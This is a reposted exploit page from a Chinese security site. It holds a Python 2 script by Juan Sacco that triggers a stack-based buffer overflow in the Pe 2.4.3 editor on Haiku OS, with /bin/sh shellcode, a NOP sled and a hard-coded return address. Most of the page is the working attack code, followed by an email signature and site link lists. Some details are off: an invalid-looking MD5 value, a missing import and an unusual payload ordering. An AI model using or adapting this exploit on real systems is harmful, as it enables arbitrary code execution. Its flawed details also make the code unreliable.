首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pe 2.4.3 Buffer Overflow
来源:http://www.exploitpack.com 作者:Sacco 发布时间:2015-12-11  
# Exploit Author: Juan Sacco - http://www.exploitpack.com <
jsacco@exploitpack.com>
# Program: Pe - Haiku OS
# Tested on: Haiku OS Alpha x86
#
# Description: Pe v2.4.3 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://hg.berlios.de/repos/pe-editor
# Tested on: Haiku-OS Alpha Pe 2.4.3
# MD5: 3vf34s2e9c9324c9876b2b02283a9f1247

import os,subprocess
def run():
  try:
    print "# Pe v2.4.3 Stack-Based Overflow by Juan Sacco"
    print "# It's Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # Basic structure: JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*1000
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\
xb0\x0b\xcd\x80"
    nops = "\x90"*12
    eip = "\x60\xec\xff\x07"
    subprocess.call(["pe",'  ', junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "PE not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Sorry, something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit PE 2.4.3 Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
run()


<https://www.avast.com/?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail>
Dit
e-mailbericht is verzonden vanaf een virusvrije computer die wordt
beschermd door Avast.
www.avast.com
<https://www.avast.com/?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail>
<#DDB4FAA8-2DD7-40BB-A1B8-4E2AA1F9FDF2>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Geeklog 2.1.0 Command Injectio
·Xdh / LinuxNet Perlbot / fBot
·IE 11.0.9600.18097 COmWindowPr
·Legend Perl IRC Bot Remote Cod
·Microsoft Windows Media Center
·Microsoft IE 11 MSHTML!CObject
·Microsoft Windows Media Center
·Siemens Simatic S7 1200 CPU Co
·phpFileManager 0.9.8 Remote Co
·Jenkins CLI RMI Java Deseriali
·Mac OS X 10.11 FTS Buffer Over
·ManageEngine Desktop Central 9
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved